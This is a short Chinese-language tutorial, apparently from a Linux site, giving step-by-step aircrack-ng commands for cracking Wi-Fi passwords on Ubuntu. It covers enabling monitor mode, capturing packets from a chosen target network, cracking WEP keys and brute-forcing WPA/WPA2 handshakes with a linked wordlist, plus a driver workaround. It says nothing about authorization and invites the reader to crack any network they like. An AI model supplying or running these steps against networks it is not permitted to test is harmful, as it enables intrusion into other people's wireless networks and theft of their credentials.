方法:
1.确保你的无线是打开的:ifconfig看是否有wlan0或别的无线适配器已经启动,如果没有,后面的步骤都执行不了
可以先用ifconfig -a看是否有无线适配器,再用ifconfig wlan0 up命令启动无线适配器(wlan0为ifconfig -a中查找到的无线适配器名称)
2.激活网卡为监听模式:
sudo airmon-ng start wlan0
3.查看无线网络,开始抓取无线数据包
sudo airodump-ng mon0
这时就会显示你当前可以搜索到的无线信号,PWR是信号值,数值越大表示信号越强,ESSID就是这个信号的名称.ENC为加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)
找到一个你希望破解的essid
4.确定目标后
sudo airodump-ng -c 6 --bssid target's MAC -w file mon0
-c 6是指这个信号的频道
5.收到足够的包之后(即data),开始破解
sudo aircrack-ng file-01.cap
如果是wep类型的密码,在收到足够多的包之后(1w)可以直接破解
如果是wpa/wpa2类型的加密方式,则必须收到握手包之后才能开始暴力破解并且需要使用密码文件(给出一个地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密码足够复杂的话这样的密码文件也是不够的,需要自己去下更复杂的加密文件
sudo aircrack-ng -w dic file-01.cap
破解成功就能拿到密码了
Ubuntu破解时出现mon0 is on channel -1, but the AP uses channel 1 的解决办法
http://aircrack-ng.org/doku.php?id=compat-wireless
最后的driver-name是你的网卡对应的sudo modprobe iwlwifi(可以用./scripts/driver-select找找看)
如果是intel 5100的无线网卡,请使用13.5的驱动程序,太高版本的驱动版本可能会用不了
Aircrack-ng 的详细介绍:请点这里
Aircrack-ng 的下载地址:请点这里
相关阅读:
Ubuntu 12.04安装最新 Reaver和 aircrack-ng 无线网络破解工具 http://www.linuxidc.com/Linux/2012-06/62045.htm
Ubuntu Linux无线密码破解利器Aircrack-ng http://www.linuxidc.com/Linux/2010-08/28007.htm